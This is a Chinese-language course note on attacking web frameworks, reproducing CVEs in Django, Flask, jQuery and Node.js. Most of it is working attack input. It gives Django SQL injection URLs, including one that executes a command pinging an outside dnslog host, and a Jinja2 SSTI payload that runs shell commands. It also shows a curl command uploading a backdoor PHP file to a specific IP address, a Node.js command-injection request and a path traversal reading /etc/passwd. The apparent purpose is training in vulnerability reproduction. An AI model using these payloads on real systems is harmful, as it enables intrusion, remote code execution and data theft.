SEC-2022版-0050-服务攻防-09-框架安全&CVE复现&Django&Flask&Node.JS&JQuery

总览

知识点：

中间件及框架列表：
IIS，Apache，Nginx，Tomcat，Docker，K8s，Weblogic，JBoos，WebSphere，Jenkins ，GlassFish，Jetty，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等
1、开发框架-PHP-Laravel-Thinkphp
2、开发框架-Javaweb-St2-Spring
3、开发框架-Python-django-Flask
4、开发框架-Javascript-Node.js-JQuery
5、其他框架-Java-Apache Shiro&Apache Sorl

常见语言开发框架：
PHP：Thinkphp Laravel YII CodeIgniter CakePHP Zend等
JAVA：Spring MyBatis Hibernate Struts2 Springboot等
Python：Django Flask Bottle Turbobars Tornado Web2py等
Javascript：Vue.js Node.js Bootstrap JQuery Angular等

章节内容：

常见中间件的安全测试：
1、配置不当-解析&弱口令
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击
4、安全应用-框架特定安全漏洞

前置知识：

• 中间件安全测试流程：
  1、判断中间件信息-名称&版本&三方
  2、判断中间件问题-配置不当&公开漏洞
  3、判断中间件利用-弱口令&EXP&框架漏洞

• 应用服务安全测试流程：
  1、判断服务开放情况-端口扫描&组合应用等
  2、判断服务类型归属-数据库&文件传输&通讯等
  3、判断服务利用方式-特定漏洞&未授权&弱口令等

• 开发框架组件安全测试流程：
  1、判断常见语言开发框架类型
  2、判断开发框架存在的CVE问题
  3、判断开发框架CVE漏洞利用方式

实例

Python-开发框架安全-Django&Flask

Django

Django是一款广为流行的开源web框架，由Python编写，许多网站和app都基于Django开发。Django采用了MTV的框架模式，即模型M，视图V和模版T，使用Django，程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件，使得Django具有较强的可扩展性。

1、cve_2019_14234
单引号已注入成功，SQL语句报错：
/admin/vuln/collection/?detail__a%27b=123
创建cmd_exec：
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20
调用cmd_exec执行命令：
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping l7gxxu.dnslog.cn%27--%20
2、CVE-2021-35042
目录：/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23
版本：/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20version())),1)%23
数据库名：/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23

Flask Jinja2 SSTI

Flask是一个使用Python编写的轻量级Web应用框架。其WSGI工具箱采用Werkzeug ，模板引擎则使用Jinja2 .

白盒测试：看参数名，加上去直接测试即可
黑盒测试：测试每一个参数，再试试测试payload。

?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D

JavaScript-开发框架安全-Jquery&Node

鉴定为JS框架的办法：

X-Powered-By: Express

jQuery

1、cve_2018_9207  cve_2018_9208 cve_2018_9209
描述: jQuery是一个快速、简洁的JavaScript框架，是继Prototype之后又一个优秀的JavaScript代码库（框架）于2006年1月由John Resig发布。
jQuery Upload File <= 4.0.2 中的任意文件上传
// 传入后门
curl -F "myfile=@heck.php" "http://8.217.99.190:45799/jquery-upload-file/php/upload.php"

Node.js

1、cve_2021_21315
Node.js是一个基于Chrome V8引擎的JavaScript运行环境，用于方便的搭建响应速度快、易于拓展的网络应用。
Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中，攻击者可以通过未过滤的参数中注入payload执行系统命令。
Systeminformation <  5.3.1
git clone https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC.git

node index.js
/api/getServices?name[]=$(echo -e 'xiaodi' > test.txt)



2、cve_2017_14849
任意文件读取，但不是获取权限
GET：
/static/../../../a/../../../../etc/passwd